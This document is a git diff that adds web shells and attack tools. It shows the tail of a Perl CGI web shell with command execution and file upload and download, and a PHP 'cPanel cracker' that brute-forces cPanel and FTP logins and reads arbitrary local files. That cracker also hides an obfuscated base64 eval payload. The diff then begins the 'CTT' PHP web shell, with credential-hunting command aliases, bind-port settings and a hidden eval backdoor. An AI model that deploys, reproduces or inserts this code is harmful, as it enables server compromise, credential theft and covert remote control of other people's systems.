+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="download">
+$Prompt download<br><br>
+Filename: <input type="text" name="f" size="35"><br><br>
+Download: <input type="submit" value="Begin">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to upload files
+#------------------------------------------------------------------------------
+sub PrintFileUploadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
+$Prompt upload<br><br>
+Filename: <input type="file" name="f" size="35"><br><br>
+Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
+Overwrite if it Exists<br><br>
+Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="upload">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the timeout for a command expires. We need to
+# terminate the script immediately. This function is valid only on Unix. It is
+# never called when the script is running on NT.
+#------------------------------------------------------------------------------
+sub CommandTimeout
+{
+	if(!$WinNT)
+	{
+		alarm(0);
+		print <<END;
+</xmp>
+<code>
+Command exceeded maximum time of $CommandTimeoutDuration second(s).
+<br>Killed it!
+<code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+		exit;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called to execute commands. It displays the output of the
+# command and allows the user to enter another command. The change directory
+# command is handled differently. In this case, the new directory is stored in
+# an internal variable and is used each time a command has to be executed. The
+# output of the change directory command is not displayed to the users
+# therefore error messages cannot be displayed.
+#------------------------------------------------------------------------------
+sub ExecuteCommand
+{
+	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
+	{
+		# we change the directory internally. The output of the
+		# command is not displayed.
+		
+		$OldDir = $CurrentDir;
+		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
+		chop($CurrentDir = `$Command`);
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
+		print "<code>$Prompt $RunCommand</code>";
+	}
+	else # some other command, display the output
+	{
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+		print "<code>$Prompt $RunCommand</code><xmp>";
+		$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
+		if(!$WinNT)
+		{
+			$SIG{'ALRM'} = \&CommandTimeout;
+			alarm($CommandTimeoutDuration);
+		}
+		if($ShowDynamicOutput) # show output as it is generated
+		{
+			$|=1;
+			$Command .= " |";
+			open(CommandOutput, $Command);
+			while(<CommandOutput>)
+			{
+				$_ =~ s/(\n|\r\n)$//;
+				print "$_\n";
+			}
+			$|=0;
+		}
+		else # show output after command completes
+		{
+			print `$Command`;
+		}
+		if(!$WinNT)
+		{
+			alarm(0);
+		}
+		print "</xmp>";
+	}
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function displays the page that contains a link which allows the user
+# to download the specified file. The page also contains a auto-refresh
+# feature that starts the download automatically.
+# Argument 1: Fully qualified filename of the file to be downloaded
+#------------------------------------------------------------------------------
+sub PrintDownloadLinkPage
+{
+	local($FileUrl) = @_;
+	if(-e $FileUrl) # if the file exists
+	{
+		# encode the file link so we can send it to the browser
+		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
+		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
+		&PrintPageHeader("c");
+		print <<END;
+<code>
+Sending File $TransferFile...<br>
+If the download does not start automatically,
+<a href="$DownloadLink">Click Here</a>.
+</code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # file doesn't exist
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $FileUrl: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function reads the specified file from the disk and sends it to the
+# browser, so that it can be downloaded by the user.
+# Argument 1: Fully qualified pathname of the file to be sent.
+#------------------------------------------------------------------------------
+sub SendFileToBrowser
+{
+	local($SendFile) = @_;
+	if(open(SENDFILE, $SendFile)) # file opened for reading
+	{
+		if($WinNT)
+		{
+			binmode(SENDFILE);
+			binmode(STDOUT);
+		}
+		$FileSize = (stat($SendFile))[7];
+		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
+		print "Content-Type: application/x-unknown\n";
+		print "Content-Length: $FileSize\n";
+		print "Content-Disposition: attachment; filename=$1\n\n";
+		print while(<SENDFILE>);
+		close(SENDFILE);
+	}
+	else # failed to open file
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $SendFile: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+
+#------------------------------------------------------------------------------
+# This function is called when the user downloads a file. It displays a message
+# to the user and provides a link through which the file can be downloaded.
+# This function is also called when the user clicks on that link. In this case,
+# the file is read and sent to the browser.
+#------------------------------------------------------------------------------
+sub BeginDownload
+{
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to upload a file. If the
+# file is not specified, it displays a form allowing the user to specify a
+# file, otherwise it starts the upload process.
+#------------------------------------------------------------------------------
+sub UploadFile
+{
+	# if no file is specified, print the upload form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileUploadForm;
+		&PrintPageFooter;
+		return;
+	}
+	&PrintPageHeader("c");
+
+	# start the uploading process
+	print "<code>Uploading $TransferFile to $CurrentDir...<br>";
+
+	# get the fullly qualified pathname of the file to be created
+	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
+	$TransferFile =~ m!([^/^\\]*)$!;
+	$TargetName .= $PathSep.$1;
+
+	$TargetFileSize = length($in{'filedata'});
+	# if the file exists and we are not supposed to overwrite it
+	if(-e $TargetName && $Options ne "overwrite")
+	{
+		print "Failed: Destination file already exists.<br>";
+	}
+	else # file is not present
+	{
+		if(open(UPLOADFILE, ">$TargetName"))
+		{
+			binmode(UPLOADFILE) if $WinNT;
+			print UPLOADFILE $in{'filedata'};
+			close(UPLOADFILE);
+			print "Transfered $TargetFileSize Bytes.<br>";
+			print "File Path: $TargetName<br>";
+		}
+		else
+		{
+			print "Failed: $!<br>";
+		}
+	}
+	print "</code>";
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to download a file. If the
+# filename is not specified, it displays a form allowing the user to specify a
+# file, otherwise it displays a message to the user and provides a link
+# through  which the file can be downloaded.
+#------------------------------------------------------------------------------
+sub DownloadFile
+{
+	# if no file is specified, print the download form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+		return;
+	}
+	
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# Main Program - Execution Starts Here
+#------------------------------------------------------------------------------
+&ReadParse;
+&GetCookies;
+
+$ScriptLocation = $ENV{'SCRIPT_NAME'};
+$ServerName = $ENV{'SERVER_NAME'};
+$LoginPassword = $in{'p'};
+$RunCommand = $in{'c'};
+$TransferFile = $in{'f'};
+$Options = $in{'o'};
+
+$Action = $in{'a'};
+$Action = "login" if($Action eq ""); # no action specified, use default
+
+# get the directory in which the commands will be executed
+$CurrentDir = $in{'d'};
+chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
+
+$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
+
+if($Action eq "login" || !$LoggedIn) # user needs/has to login
+{
+	&PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+	&ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+	&UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+	&DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+	&PerformLogout;
+}
diff --git a/php/cpanel.php b/php/cpanel.php
new file mode 100644
index 0000000..8a64bd9
--- /dev/null
+++ b/php/cpanel.php
@@ -0,0 +1,178 @@
+<html>
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+</head>
+<title>Aria cPanel cracker version 1.0 - Edited By KingDefacer</title>
+<style>
+body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
+input,
+.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
+button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
+body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+a:active { outline: none; }
+a:focus { -moz-outline-style: none; }
+</style>
+  <style type='text/css'>
+  <!--
+       A:link {text-decoration: none; color:#cccccc }
+       A:visited {text-decoration: none; color:#cccccc }
+       a:hover {text-decoration: none; color:#000000}
+  -->
+</style>
+<?php
+@ini_set('memory_limit', 1000000000000);
+$connect_timeout=5;
+@set_time_limit(0);
+$submit = $_REQUEST['submit'];
+$users = $_REQUEST['users'];
+$pass = $_REQUEST['passwords'];
+$target = $_REQUEST['target'];
+$option = $_REQUEST['option'];
+$page = $_GET['page'];
+
+if($target == ''){
+$target = 'localhost';
+$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));}?>
+<?php
+ print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
+<br><b><center><a href='?page=bio'> bio </a> - <a href='?page=crack'> brute </a> - <a href='?page=users'> grab users </a><br><br></center></td></tr></table>";
+ if ( $page == 'bio' ){
+print 
+"<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
+<br><b>Please enter your USERNAME and PASSWORD to logon<br>
+user<br>
+220 +ok<br>
+pass ********<br>
+220 +ok login successful<br>
+[ user@alturks.com ]# info<b><br><font face=tahoma><br>
+<font color='red' >Aria cPanel cracker version : 1.0 </font><b><br><br>
+Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version<br>
+Our website , <a href='http://alturks.com'> http://alturks.com</a><br>
+</center><br></td></tr></table>";
+ }elseif( $page == 'crack'){
+ 
+@ini_set('memory_limit', 1000000000000);
+$connect_timeout=5;
+@set_time_limit(0);
+$submit = $_REQUEST['submit'];
+$users = $_REQUEST['users'];
+$pass = $_REQUEST['passwords'];
+$target = $_REQUEST['target'];
+$option = $_REQUEST['option'];
+if($target == ''){
+$target = 'localhost';
+}
+print " <div align='center'>
+<form method='post' style='border: 1px solid #000000'><br><br>
+<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
+<b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
+<div align='center'><br>
+<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
+<tr>
+<td align='center'>
+<b>Username</b></td>
+<td>
+<p align='center'>
+<b>Password</b></td>
+</tr>
+</table>
+<p align='center'>
+<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
+<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$pass</textarea><br>
+<br>                         
+<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel 
+<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
+</td></tr></table></td></tr></form><p align= 'left'>";
+?>
+<?php
+function ftp_check($host,$user,$pass,$timeout){
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "ftp://$host");
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
+curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
+curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
+curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
+curl_setopt($ch, CURLOPT_FAILONERROR, 1);
+$data = curl_exec($ch);
+if ( curl_errno($ch) == 28 ) {
+
+print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
+exit;}
+
+elseif ( curl_errno($ch) == 0 ){
+
+print 
+"<b>[ user@alturks.com ]# </b>
+<b> Attacking has been done , found username , <font color='#FF0000'> $user </font> and password , 
+<font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
+
+function cpanel_check($host,$user,$pass,$timeout){
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
+curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
+curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
+curl_setopt($ch, CURLOPT_FAILONERROR, 1);
+$data = curl_exec($ch);
+if ( curl_errno($ch) == 28 ) { 
+print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
+exit;}
+elseif ( curl_errno($ch) == 0 ){
+
+print 
+"<b>[ user@alturks.com ]# </b>
+<b>Attacking has been done , found username , <font color='#FF0000'> $user </font> and password , 
+<font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
+
+if(isset($submit) && !empty($submit)){
+
+$userlist = explode ("\n" , $users );
+$passlist = explode ("\n" , $pass );
+print "<b>[ user@alturks.com ]# Attacking ...</font></b><br>";
+foreach ($userlist as $user) {
+$_user = trim($user);
+foreach ($passlist as $password ) {
+$_pass = trim($password);
+if($option == "ftp"){
+ftp_check($target,$_user,$_pass,$connect_timeout);
+}
+if ($option == "cpanel")
+{
+cpanel_check($target,$_user,$_pass,$connect_timeout);
+}
+}
+}
+}
+}elseif ( $page == 'users'){
+echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
+echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="grab !"></form>';
+$file = $_POST['file'];
+$level=0;
+if(!file_exists("file:"))
+    @mkdir("file:");
+@chdir("file:");
+$level++;
+
+$hardstyle = @explode("/", $file);
+
+for($a=0;$a<count($hardstyle);$a++){
+    if(!empty($hardstyle[$a])){
+        if(!file_exists($hardstyle[$a])) 
+            @mkdir($hardstyle[$a]);
+        @chdir($hardstyle[$a]);
+        $level++;
+    }
+}
+while($level--) chdir("..");
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
+echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
+if(FALSE==curl_exec($ch))
+die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
+echo ' </textarea> </FONT>';
+curl_close($ch);
+print '</table>';
+}
+?>
diff --git a/php/ctt_sh.php b/php/ctt_sh.php
new file mode 100644
index 0000000..51ec008
--- /dev/null
+++ b/php/ctt_sh.php
@@ -0,0 +1,2927 @@
+<?php
+$timelimit = 60;
+$sul = "?";
+$rd = "./";
+$shver = "0.1";
+$login = "";
+$pass = "";
+$md5_pass = "";
+$login = false;
+$autoupdate = true;
+$updatenow = false;
+$autochmod = 755; 
+$filestealth = 1; 
+$donated_html = "";
+$donated_act = array("");
+$host_allow = array("*");
+$curdir = "./";
+$tmpdir = dirname(__FILE__); 
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 9999;
+$bindport_pass = "ctt";
+$bindport_port = "11457";
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+$aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+$aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+$aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+$sess_method = "cookie";
+$sess_cookie = "ctshvars";
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."ctshvars_".$sid.".tmp";
+$usefsbuff = true;
+$copy_unset = false;
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul);
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d");
+$quicklaunch1 = array();
+$quicklaunch1[] = array("<b>Ïğîöåññû</b>",$sul."act=ps_aux&d=%d");
+$quicklaunch1[] = array("<b>Ïàğîëè</b>",$sul."act=lsa&d=%d");
+$quicklaunch1[] = array("<b>Êîìàíäû</b>",$sul."act=cmd&d=%d");
+$quicklaunch1[] = array("<b>Çàãğóçêà</b>",$sul."act=upload&d=%d");
+$quicklaunch1[] = array("<b>Áàçà</b>",$sul."act=sql&d=%d");
+$quicklaunch1[] = array("<b>PHP-Êîä</b>",$sul."act=eval&d=%d");
+$quicklaunch1[] = array("<b>PHP-Èíôî</b>",$sul."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch1[] = array("<b>Ñàì óäàëÿşò</b>",$sul."act=selfremove");
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+@$f = $_GET[f];
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"CTT SHELL\"");
+ header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "ctshell.php";}
+ ctsh_getupdate();
+ $data = file_get_contents($ctsh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("ct_sess_put"))
+{
+function ct_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+$ret = true;
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
